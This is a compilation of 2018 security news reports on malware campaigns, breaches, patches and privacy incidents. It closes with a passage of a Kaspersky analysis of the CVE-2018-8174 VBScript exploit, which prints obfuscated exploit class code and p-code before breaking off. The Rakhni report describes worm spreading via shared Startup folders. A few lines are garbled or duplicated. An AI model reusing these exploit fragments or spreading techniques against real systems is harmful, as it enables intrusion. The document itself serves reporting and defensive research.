If the target system has a ‘Bitcoin’ folder in the AppData section, the malware first terminates all processes that match a predefined list of popular applications, then encrypts files with the RSA-1024 encryption algorithm and then displays a ransom note via a text file.

Before encrypting files with the RSA-1024 encryption algorithm, the malware terminates all processes that match a predefined list of popular applications and then displays a ransom note via a text file.

If the ‘Bitcoin’ folder doesn’t exist and the machine has more than two logical processors the malware drops the MinerGate utility to mine Monero (XMR), Monero Original (XMO) and Dashcoin (DSH) cryptocurrencies in the background.

This variant of the Rakhni malware installs a root certificate that’s stored in its resources and every executable it downloads is signed with this certificate. We have found fake certificates that claim to have been issued by Microsoft Corporation and Adobe Systems Incorporated.
Experts also noticed that the malware uses the CertMgr.exe utility to install fake root certificates that claim to have been issued by Microsoft Corporation and Adobe Systems Incorporated in an attempt to disguise the miner as a trusted process.

If the infected system doesn’t have a ‘Bitcoin’ folder and has only a single logical processor, the malware activates the worm component that allows the malicious code to spread among all the computers in the local network using shared resources.

“As one of its last actions the downloader tries to copy itself to all the computers in the local network. To do so, it calls the system command ‘net view /all’ which will return all the shares and then the Trojan creates the list.log file containing the names of computers with shared resources” the researchers report.

“For each computer listed in the file the Trojan checks if the folder Users is shared and, if so, the malware copies itself to the folder \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup of each accessible user,”

The experts also noticed that the malware implements spyware capabilities.

Most of the infections are in Russia (95.5%), other systems infected with the malware are in Kazakhstan (1.36%), Ukraine (0.57%), Germany (0.49%), and India (0.41%) as well.

Further details including the IoCs are reported in the analysis published by Kaspersky.


Ex-NSO Employee Accused of Stealing Spyware Source Code
6.7.2018 securityweek
Virus

A former employee of Israel-based cyber arms dealer NSO Group has been accused of stealing spyware source code from the company and attempting to sell it for $50 million, Israel’s Justice Ministry announced this week.

The suspect has not been named, but court documents reveal that he’s a 38-year-old from Netanya hired by NSO as a senior programmer in the company's automation team.

According to prosecutors, NSO informs employees that they are prohibited from copying any software from work devices, a rule that is enforced using a McAfee product that can prevent external storage units from being connected to computers.

Investigators claim that the suspect searched the Web for ways to bypass the security product, methods which he used to copy both NSO software and its source code following a poor performance review from his manager.

The suspect then allegedly searched the Internet for potential buyers of the spyware. He is said to have attempted to sell the files for $50 million in cryptocurrency on the dark web, but his potential buyer alerted NSO, which led to the employee’s dismissal and arrest. Investigators found the stolen files on an external drive hidden under a mattress in the suspect’s home.

Court documents show that the suspect told the potential buyer that he was a hacker who had broken into NSO’s systems.

Authorities allege that the defendant’s actions could have harmed state security and could have led to NSO’s collapse. However, the firm told Israeli media that the stolen files were not shared with a third party.

NSO Group, a company owned by US private equity firm Francisco Partners Management, is best known for Pegasus and Chrysaor, tools designed for spying on iOS and Android phones, respectively.

In 2016, Apple released an emergency patch for iOS after researchers discovered that Pegasus had been exploiting three zero-day vulnerabilities in the mobile operating system.

NSO claims to sell its tools only to governments to help them in their fight against terrorists and criminals. However, Pegasus has apparently been abused in some cases, including in Mexico, where the government was accused last year of using it to spy on journalists and activists.

According to recent reports, Verint Systems is in talks to acquire NSO for roughly $1 billion.


Vietnam Activists Flock to 'Safe' Social Media After Cyber Crackdown
6.7.2018 securityweek
Social

Tens of thousands of Vietnamese social media users are flocking to a self-professed free speech platform to avoid tough internet controls in a new cybersecurity law, activists told AFP.

The draconian law requires internet companies to scrub critical content and hand over user data if Vietnam's Communist government demands it.

The bill, which is due to take effect from January 1, sparked outcry from activists, who say it is a chokehold on free speech in a country where there is no independent press and where Facebook is a crucial lifeline for bloggers.

The world's leading social media site has 53 million users in Vietnam, a country of 93 million.

Many activists are now turning to Minds, a US-based open-source platform, fearing Facebook could be complying with the new rules.

"We want to keep our independent voice and we also want to make a point to Facebook that we're not going to accept any censorship," Tran Vi, editor of activist site The Vietnamese, which is blocked in Vietnam, told AFP from Taiwan.

Some activists say they migrated to Minds after content removal and abuse from pro-government Facebook users.

Two editors' Facebook accounts were temporarily blocked and The Vietnamese Facebook page can no longer use the "instant article" tool to post stories.

Nguyen Chi Tuyen, an activist better known by his online handle Anh Chi, says he has moved to Minds as a secure alternative, though he will continue using Facebook and Twitter.

"It's more anonymous and a secretive platform," he said of Minds.

He has previously had to hand over personal details to Facebook to verify his identity and now fears that information could be used against him.

- 'Scary' law -

About 100,000 new active users have registered in Vietnam in less than a week, many posting on politics and current affairs, Minds founder and CEO Bill Ottman told AFP.

"This new cybersecurity law is scaring a lot of people for good reason," he said from Connecticut.

"It's certainly scary to think that you could not only be censored but have your private conversations given to a government that you don't know what they're going to use that for."

The surge of new users from Vietnam now accounts for nearly 10 percent of Minds total user base of about 1.1 million.

Users are not required to register with personal data and all chats are encrypted.

Vietnam's government last year announced a 10,000-strong cybersecurity army tasked with monitoring incendiary material online.

In its unabashed defence of the new law, Vietnam has said it is aimed at protecting the regime and avoiding a "colour revolution", but refused to comment to AFP on Thursday.

Facebook told AFP it is reviewing the law and says it considers government requests to take down information in line with its Community Standards -- and pushes back when possible.

Google declined to comment on the new law when asked by AFP, but their latest Transparency report showed that it had received 67 separate requests from the Vietnamese government to remove more than 6,500 items since 2009, the majority since early last year.

Most were taken down, though Google does not provide precise data on content removal compliance.

Ottman says countries like Vietnam are fighting a losing battle trying to control online expression.

"It's like burning books, it just causes more attention to be brought to those issues and it further radicalises those users because they're so upset that they're getting censored," he said.


Chinese hackers breached into systems at Australian National University … and are still there
6.7.2018 securityaffairs BigBrothers

Chinese hackers breached into the systems of Australian National University (ANU) and according to the experts they are still there.
Chinese hackers continue to target organizations worldwide, this time attackers based in China breached into the systems of Australian National University (ANU), one of the most prestigious Australian universities.

The bad news is that experts are still working to lock the hackers out because the threat is still active in the network of the Australian University.

“The ABC has been told the Australian National University (ANU) system was first compromised last year.” reported the ABC news.

The ANU had been working with intelligence agencies for several months to contain the threat and minimize its impact.

“The university has been working in partnership with Australian government agencies for several months to minimise the impact of this threat, and we continue to seek and take advice from Australian government agencies,” reads the official statement published by the Australian National University.

“Current assessments indicate no staff, student or research information has been taken and counter-measures are being undertaken.”

Chinese hackers

The Cyber Security Minister Angus Taylor pointed out that the Australian Government “condemns any malicious activity” that targets the systems of the country.

“We know that nation states and criminal groups actively target research and tertiary institutions to steal the intellectual property of hardworking Australians,” he said.

“Malicious cyber activity against Australia’s national interests, whether from criminal syndicates or foreign states, is increasing in frequency, sophistication and severity, and the Australian Government’s highest priority is ensuring Australians are safe and our interests are secure.”

Mr Taylor confirmed that the Australian Cyber Security Centre (ACSC) had been supporting ANU in this case.

“The Australian Cyber Security Centre works closely with any affected organisations to reduce the likelihood of threat actors being successful and to help them recover when they are compromised,” he said.

Australian systems are always under attack, in October 2016 a report published by the Australian Cyber Security Centre confirmed the Australian Bureau of Meteorology hack was powered by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defense agencies, its disclosure could give a significant advantage to a persistent attacker for numerous reasons.

Initial media reports blamed China for the cyber attack, in 2013 Chinese hackers were accused by authorities of stealing the top-secret documents and projects of Australia’s new intelligence agency headquarters.


Hamas cyber-operatives lure Israeli soldiers to spyware hidden in tainted apps

6.7.2018 securityaffairs BigBrothers

Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones.
According to a report published by the Israeli military, Hamas hackers are attempting to lure Israel Defence Forces (IDF) soldiers into installing tainted apps on their devices.

Israeli military already blamed Hamas of similar attacks, but this time the hackers managed to serve the apps through the official Google Play Store to increase the likelihood of success.

The experts from the Israel firm ClearSky have identified the following apps:

WinkChat – com.winkchat.apk (dating app)
GlanceLove – com.coder.glancelove.apk (dating app)
Golden Cup – anew.football.cup.world.com.worldcup.apk (Wordcup app)
Hamas GlanceLove fake app

Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then trick them into installing one of the compromised apps.

Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January-

In January, the hackers used the profile of a woman named “Elianna Amer,” in these last attacks, that lasted at least for three months, they used the profile of a woman named “Lina Kramer.”

“I got a message on Facebook that looked innocent at first, from someone named Lina Kramer, we started talking on Facebook, then we moved to Whatsapp, and then she asked me to download an app called GlanceLove,” explained a former IDF soldier.

“At this stage, my suspicion was final, and I decided to consult a friend who helped me understand that it was a fictitious profile with malicious intentions. From there I turned to the information security officer in my unit who helped me.”

According to Israeli army intelligence officers, the attacks failed to damage military security.

“No damage was done, as we stopped it in time,” one of the officers said.

Th Israeli newspaper Haaretz provided a different version of the facts, it reported that at least “hundreds” of soldiers were infected.

“Hamas managed to hack into the phones of hundreds of Israeli soldiers using dating and World Cup apps and managed to gather sensitive information about the military and some of its bases around the Gaza strip.” reported Haaretz.

“The apps allowed malicious software controlled by Hamas to be planted into Android smartphones, enabling militants in the Strip to access pictures, phone numbers and email addresses of soldiers posted close to the border, and even allowed Hamas to control the phones’ cameras and microphones remotely.”

The analysis of the apps revealed they were tainted with a spyware that can take over devices and exfiltrate sensitive data.

According to the experts, threat actor behind these attacks is codenamed Arid Viper.

In 2015, security experts at Trend Micro uncovered a cyber espionage campaign, dubbed Operation Arid Viper, that targeted Israeli institutions. The Operation Arid Viper was run by Arab-speaking hackers that sought to extract sensitive documents by sending phishing emails. The phishing campaigns targeted government office, infrastructure providers, a military organization, and academic institutions in Israel and Kuwait

In the past, security experts linked Hamas operatives to another APT tracked as Gaza Cybergang (Gaza Hackers Team or Molerats).


Thunderbird Version 52.9 addresses several issues, including the EFAIL flaw
6.7.2018 securityaffairs
Vulnerebility

The Thunderbird team released a new version of the popular email client that addresses many security issued, including the EFAIL vulnerability.
Thunderbird has released a new version to address a dozen security vulnerabilities, including the EFAIL encryption issue that was discovered in May.

The new version addresses two EFAIL-related issues in the way Thunderbird handles encrypted messages.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers that discovered the EFAIL flaw.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

The new Thunderbird 52.9 addresses the CVE-2018-12372 flaw that can be exploited by attackers to build S/MIME and PGP decryption stubs in HTML messages.

“Decrypted S/MIME parts, when included in HTML crafted for an attack, can leak plaintext when included in a HTML reply/forward.” reads the security advisory published by the Mozilla Foundation.

The new version also fixes the CVE-2018-12373 flaw that could result in the leakage of S/MIME plaintext when a message is forwarded.

Thunderbird 52.9 also addresses some critical flaws such as the CVE-2018-12359 that is a buffer overflow vulnerability that could be exploited to crash a vulnerable system

“A buffer overflow can occur when rendering canvas content while adjusting the height and width of the <canvas> element dynamically, causing data to be written outside of the currently computed boundaries.”

Thunderbird

The new release also fixes a use-after-free flaw tracked as CVE-2018-12360 that could be exploited to crash a target system.

“A use-after-free vulnerability can occur when deleting an
input
element during a mutation event handler triggered by focusing that element. This results in a potentially exploitable crash.” continues the advisory.

Another security issue is related to the executable SettingContent-ms files, the security researcher Matt Nelson discovered that Windows 10 users weren’t getting warned when they were opening such kind of files. This issue was tracked as CVE-2018-12368 and could be used by attackers to execute arbitrary code by tricking users into opening the files.

“Windows 10 does not warn users before opening executable files with the SettingContent-ms extension even when they have been downloaded from the internet and have the “Mark of the Web.” continues the advisory.

“Without the warning, unsuspecting users unfamiliar with this new file type might run an unwanted executable. This also allows a WebExtension with the limited downloads.open permission to execute arbitrary code without user interaction on Windows 10 systems”.

Thunderbird also addressed some memory sasome memoryat derived from the Firefox code base.

The good news is that the bugs coild not ne directly exploitable in the e-mail client because scripting is disabled while users are reading messages.


New Smoke Loader campaign aims at stealing multiple credentials from many applications
6.7.2018 securityaffairs
Virus

Recently experts from Talos security spotted a malware campaign leveraging Smoke Loader to steal credentials from a broad range of applications.

Security experts have discovered a new malware campaign leveraging Smoke Loader to steal credentials from web browsers, email clients, and other popular applications.

The attack chain starts with messages using a weaponized Word document as an attachment, the hackers attempt to trick victims into opening it and enable the embedded macro.

Smoke Loader

Once executed, the macro downloads the TrickBot banking Trojan that in this campaign is used to fetch the Smoke Loader backdoor.

Smoke Loader is a tiny dropper used to install on the infected system other malware families, but in this specific campaign, the experts observed an inversion of roles, with TrickBot that downloads it.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader.” reads the analysis published by Talos.

“This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,”

While malware frequently iterates through process lists to find a process to inject, this new backdoor variant calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe.

The malware also uses the PROPagate technique to inject code into Explorer, the same technique recently implemented by RIG Exploit Kit operators to deliver cryptocurrency miners.

The malware also implements several anti-analysis techniques, along with anti-debugging and anti-VM checks and the analysis of threads associated with the scanning for processes and windows belonging to analysis tools.

The Smoke Loader variant used in this campaign was receiving five plugins, each of them was executed in its own Explorer.exe process.

The plugins were designed to steal sensitive information from the infected machine and stored credentials and sensitive information managed by the web browser.

“In our Trickbot cases, the malware finally downloaded the Smoke Loader trojan, which installed five additional Smoke Loader plugins.” continues the analysis.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers”

The first plugin implements roughly 2,000 functions and it is able to target a broad range of applications, including Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird, to steal hostname and credentials. This plugin also attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.

The second plugin recursively searches through directories looking for files to parse and exfiltrate.

The third plugin injects into browsers to intercept credentials and cookies as they are transferred over HTTP and HTTPS, while the fourth hooks ws2_32!send and ws2_32!WSASend to attempt to steal credentials for ftp, smtp, pop3, and imap.

The fifth plugin injects code into TeamViewer.exe to steal credentials

“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools.” concludes the analysis.

“This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.


CipherTrace Unveils Crypto-Currency Anti-Money Laundering Solution
5.7.2018 securityweek  Cryptocurrency

Cryptocurrency theft and its use to launder other illegal activity is booming. This has prompted the evolution of a related industry that sits on the borderline of legality (barely legal in some jurisdictions, illegal in others): cryptocurrency money laundering. The laundering of illegally-obtained money may be illegal, but the process used may not be.

CoinMixer is one such service that is advertised on Google Search. It says of its service, "Generally there is no link between the original transactions and the final address of the coins. This process protects your privacy and prevents other people tracing your payments on the internet." While this process can help with possibly legitimate privacy concerns, it is precisely what is required for money laundering.

Menlo Park, Calif. startup CipherTrace is a firm founded on the need for cryptocurrency anti-money laundering (AML), blockchain forensics and enforcement solutions. It aids law enforcement and financial regulators in their investigations, helps enterprises to deploy real-world cryptocurrency transactional systems within regulations, and offers a bitcoin scam and theft asset recovery service.

The CipherTrace Cryptocurrency Anti-Money Laundering Report for Q2, 2018 (PDF) shows the size of the problem; and highlights some of the regulatory discussions happening at international levels. Stolen cryptocurrency alone reached more than $750 million in the first half of 2018 -- which is already nearly three-times the amount stolen in 2017. The report also adds, "The FBI noted that the value of virtual currencies contained in the Internet Crime Center 2017 reports were $58.3M,4 citing cyber actor demands the of ransom payments, typically in virtual currency such as Bitcoin."

All this currency needs to be laundered before it can be safely accessed by the criminals. This is typically done through sites offering mixers, tumblers and chain hopping services. "The more dirty crypto money that goes into the systems and the more it moves around, the harder it becomes for investigators to see through the web of action and trace a path back to the source."

Governments and law enforcement agencies are not ignoring the use of cryptocurrencies to launder illegal gains. At the 5th Annual Europol Virtual Currency Conference, which was held at the Hague in the Netherlands, Jamal El-Hindi of the U.S. Financial Crimes Enforcement Network (FinCEN) reiterated FinCEN's position. "We will hold accountable foreign-located money transmitters, including virtual currency exchangers, that do business in the United States when they willfully violate U.S. AML laws."

The cryptocurrency theft problem that fosters the cryptocurrency laundering industry shows no sign of slowing down. It ranges from the theft of individual wallets, the use of various cryptocurrencies within ransomware extortion, and major thefts from large cryptocurrency exchanges.

"Cybercriminals follow easy money," comments High-Tech Bridge CEO Ilia Kolochenko, "and many cryptocurrency owners are the perfect victims. They are virtually unable to protect either themselves or their digital assets, being susceptible even to relatively simple phishing attacks. Law enforcement is frequently uninterested in investigating and prosecuting petty offences with digital coins theft, as they are already under water with highly-sophisticated nationwide hacks."

He points out that cryptocurrency startups are often ignorant of the fundamentals of cybersecurity, and devote all their efforts and resources to survival in an extremely volatile and highly-competitive market.

"We can almost certainly expect further proliferation of security incidents related to crypto currencies. Attackers have now established impressive infrastructure purposely tailored for large-scale theft and scams with digital coins. Owners of the crypto assets should remain extremely vigilant, maintain all their devices and installed software up-to-date, install at least a free antivirus from a reputable vendor, use two-factor authentication and unique passwords, and never entrust their wallets to any third-parties unless they have a very good reason to utterly trust them."

F-Secure security advisor Sean Sullivan has advocated for a form of 'Know Your Customer' regulation to be applied to cryptocurrency exchanges. "Bitcoin exchange accounts could be required to be tied to a physical address," Sullivan said. Currently it takes just minutes -- or seconds -- to open a Bitcoin account in a third-party market. This requirement would require an activation code that's mailed to you before an account can be opened. While this wouldn't affect criminals who do business out of Russia and China, it would make their attacks far less profitable; and would make the tracking of illegally acquired cryptocurrency by law enforcement considerably easier.

"The exchanges would hate it. But given the hundreds of millions of dollars being extorted every few months, it seems appropriate," Sullivan says. "Barring this or a similar step, exponential growth of malware families delivering these threats seems to be the only other option."


NHS Digital Erroneously Reveals Data of 150,000 Patients
5.7.2018 securityweek BigBrothers

On Monday July 2, Jackie Doyle-Price, the parliamentary under-secretary of state for health, delivered a written statement to the UK parliament. It explained that 150,000 NHS patients who had specifically opted out of the NHS patient data-sharing regime were in fact not opted out.

"As a result," says the statement, "these objections were not upheld by NHS Digital in its data disseminations between April 2016, when the NHS Digital process for enabling them to be upheld was introduced, and 26 June 2018. This means that data for these patients has been used in clinical audit and research that helps drive improvements in outcomes for patients."

NHS Digital is the national information and technology partner to the health and social care system. It has responsibility for standardizing, collecting and publishing data and information from across the health and social care system in England. It is therefore responsible for storing and disseminating NHS patient data to those qualified to receive it.

On the same day, NHS Digital released its own statement. "We apologize unreservedly for this issue, which has been caused by a coding error by a GP system supplier (TPP) and means that some people's data preferences have not been upheld when we have disseminated data. The TPP coding error meant that we did not receive these preferences and so have not been able to apply them to our data."

It seems that a software error in an application named SystmOne, written by software firm TPP and designed to allow patients to opt out of data sharing at their local NHS surgery, failed to record the objections. Those objections were therefore not relayed to NHS Digital. Since the system relies on patients opting out rather than opting in to data sharing, NHS Digital assumed that all patients had agreed.

The software error was detected on 28 June, three years after SystmOne was released, when TPP switched to a new system. Neither Jackie Doyle-Price nor NHS Digital has given figures on how many times this data might have been erroneously shared externally during this period. However, NHS Digital compiles and publishes a register of organizations that receive patient data. The most recent publication (XLS) covers the period from December 2017 to February 2018. It shows that patient data was shared more than 5,300 times in these three months.

It also shows where the data shared is considered to be sensitive or non-sensitive, and whether the data was anonymized or is identifiable. The anonymization is performed in accordance with the UK data protection regulator's requirements; but many privacy activists do not believe that anonymization is irreversible.

"As part of our commitment to the secure and safe handling of health data, on 25 May 2018 [the date on which GDPR became required] the Government introduced the new national data opt-out. The national data opt-out replaces Type 2 objections. This has simplified the process of registering an objection to data sharing for uses beyond an individual's care. The new arrangements give patients direct control over setting their own preferences for the secondary use of their data and do not require the use of GP systems, and therefore will prevent a repeat of this kind of GP systems failure in the future."

It remains an opt-out of data sharing rather than an opt-in to data sharing -- the latter being generally required by GDPR.

Dr John Parry, Clinical Director at TPP, said: "TPP and NHS Digital have worked together to resolve this problem swiftly. The privacy of patient data is a key priority for TPP, and we continually make improvements to our system to ensure that patients have optimum control over information. In light of this, TPP apologizes unreservedly for its role in this issue."

NHS Digital added, "We are confident that we are now respecting all opt-outs that have been recorded in the system. We will also be contacting organizations with whom we have shared data that may have been affected, and work with them to destroy the data where possible."

In an emailed comment, Mike Smart, a security strategist at Forcepoint, told SecurityWeek, "In this case, it appears the underlying program left patient data exposed, even though each party involved in handling the data was aware of the privacy policy settings. It's a clear indicator that relying too heavily on software will cause these mistakes to happen in the future. We can't afford to leave out the human element when deciding how we protect sensitive data, and must involve creative and lateral thinking in the testing and final checking stage before software goes live."


Google Fixes Critical Android Vulnerabilities
5.7.2018 securityweek 
Vulnerebility

Google this week released its July 2018 set of Android patches to address tens of vulnerabilities in the mobile operating system, including several rated as Critical.

The Internet giant addressed 11 vulnerabilities as part of the 2018-07-01 security patch level, including three rated Critical and 8 High risk bugs. The issues impact framework, media framework, and system.

All three Critical severity bugs are remote code execution flaws, one for each of the impacted components. The remaining vulnerabilities include information disclosure bugs, elevation of privilege issues, and denial of service flaws.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes in an advisory.

Affected operating system versions include Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

A total of 32 flaws were addressed as part of the 2018-07-05 security patch level, 8 rated Critical severity and 24 considered High risk.

These issues impact Kernel, Qualcomm, and Qualcomm closed-source components such as IPV6 stack, futex, USB driver, WLAN, nsfs, OpenGL ES driver, and ADSPRPC heap manager.

Of the resolved vulnerabilities, 22 were impacting Qualcomm closed-source components. These include 7 Critical issues and 15 High risk flaws.

6 vulnerabilities were addressed in Qualcomm components, including a Critical remote code execution flaw, one High severity remote code execution bug, two High risk information disclosure issues, and two elevation of privilege vulnerabilities.

All of the 4 flaws addressed in Kernel components were elevation of privilege bugs.

This month, Google also addressed 26 Medium severity issues impacting Pixel and Nexus devices. Affected components include framework, media framework, system, Kernel components, and Qualcomm components.

Most of the addressed issues were elevation of privilege bugs, but remote code execution and information disclosure security vulnerabilities were also addressed.

Additionally, the Internet giant released a functional update for the Pixel and Nexus devices, to “improve consistency of Wi-Fi connections with certain routers,” the advisory reads.

Last month, Google addressed a dozen Critical flaws in Android, along with tens of High risk issues. The company also resolved over 60 vulnerabilities affecting Pixel and Nexus devices, most of which were rated Medium severity.


New Smoke Loader Attack Targets Multiple Credentials
5.7.2018 securityweek
Virus

A recently detected Smoke Loader infection campaign is attempting to steal credentials from a broad range of applications, including web browsers, email clients, and more.

The attacks begin with malicious emails carrying a Word document as an attachment. Using social engineering, the attackers attempt to lure victims into opening the document and executing an embedded macro.

Once executed, the macro initiates a second stage and downloads the TrickBot malware, which instead fetches the Smoke Loader backdoor, Cisco Talos reports.

Smoke Loader has been long used as a downloader for various malware families, including banking Trojans, ransomware, and crypto-currency miners. In some of the previous campaigns, it was also used as a dropper for TrickBot, but it appears tables have turned now.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,” Talos says.

The new backdoor variant, the security researchers reveal, doesn’t iterate through process lists to find a process to inject code into, but calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe. It also uses the PROPagate technique to inject code into Explorer.

First described in late 2017, the method hasn’t been adopted by another malware to date, and no public Proof-of-Concept (PoC) has been published to date. Smoke Loader is the first to use the technique, and FireEye too reported this last week.

The malware also includes a series of anti-analysis techniques, along with anti-debugging and anti-VM checks.

Unlike previous attacks, where Smoke Loader would drop additional payloads, the backdoor was observed receiving five plugins instead. Each plugin was executed in its own Explorer.exe process, but older techniques were used to inject each plugin into those processes. The attack ultimately results in six Explorer.exe processes running on the infected machine.

All of the plugins were designed to steal sensitive information from the victim machine and explicitly target stored credentials and sensitive information transferred over a browser.

The first plugin contains around 2,000 functions and targets Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird to steal hostname, username, and password data. Additionally, it attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.

The second plugin searches through directories for files to parse and exfiltrate. The third plugin injects into browsers to intercept credentials and cookies, the fourth attempts to steal credentials for ftp, smtp, pop3, and imap, while the fifth injects code into TeamViewer.exe for credential theft.

“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.


Delving deep into VBScript

5.7.2018 Kaspersky Vulnerebility
Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.

But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of the VBScript interpreter.

Undocumented platform
Debugging a VBScript executable is a tedious task. Before the script is executed, it is compiled into p-code, which is then interpreted by the virtual machine. There is no open source information about the internal structure of this virtual machine and its instructions. It took me a lot of effort to track down a couple of web pages with Microsoft engineer reports dated 1999 and 2004 that shed some light on the p-code. There was enough information there for me to fully reverse-engineer all the VM instructions and write a disassembler! The final scripts for disassembling VBScript p-code in the memory of the IDA Pro and WinDBG debuggers are available in our Github repository.

With an understanding of the interpreted code, we can precisely monitor the execution of the script: we have full information about where the code is being executed at any given moment, and we can observe all objects that are created and referenced by the script. All this greatly assists in the analysis.

The best place to run the disassembling script is the CScriptRuntime::RunNoEH function, which directly interprets the p-code.

Important fields in the CScriptRuntime class

The CScriptRuntime class contains all information about the state of the interpreter: local variables, function arguments, pointers to the top of the stack and the current instruction, plus the address of the compiled script.

The VBScript virtual machine is stack-oriented and consists of slightly more than 100 instructions.

All variables (local arguments and ones on the stack) are represented as a VARIANT structure occupying 16 bytes, where the upper word indicates the data type. Some of the type values are given on the relevant MSDN page.

CVE-2018-8174 exploitation
Below is the code and disassembled p-code of class ‘Class1’:

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
 

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg -1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd
 

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg –1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr –1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd
Function 34 is a constructor of class ‘Class1’.

The OP_CreateClass instruction calls the VBScriptClass::Create function to create a VBScriptClass object.

The OP_FnBindEx and OP_CreateVar instructions try to fetch the variables passed in the arguments, and since they do not yet exist, they are created by the VBScriptClass::CreateVar function.

This diagram shows how variables can be fetched from a VBScriptClass object. The value of the variable is stored in the VVAL structure:

To understand the exploitation, it is important to know how variables are represented in the VBScriptClass structure.

When the OP_NamedSt ‘mem’ instruction is executed in function 36 (‘SetProp’), it calls the Default Property Getter of the instance of the class that was previously stacked and then stores the returned value in the variable ‘mem’.

***BOS(8292,8301)*** mem=Value *****
0000OP_Bos1 0
0002OP_LocalAdr -1 <-------- put argument on stack
0005OP_NamedSt ‘mem’ <-------- if it's a class dispatcher with Default Property Getter, call and store returned value in mem

Below is the code and disassembled p-code of function 30 (p), which is called during execution of the OP_NamedSt instruction:

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl(“174088534690791e-324”)
For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class
 

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl(“174088534690791e-324”)
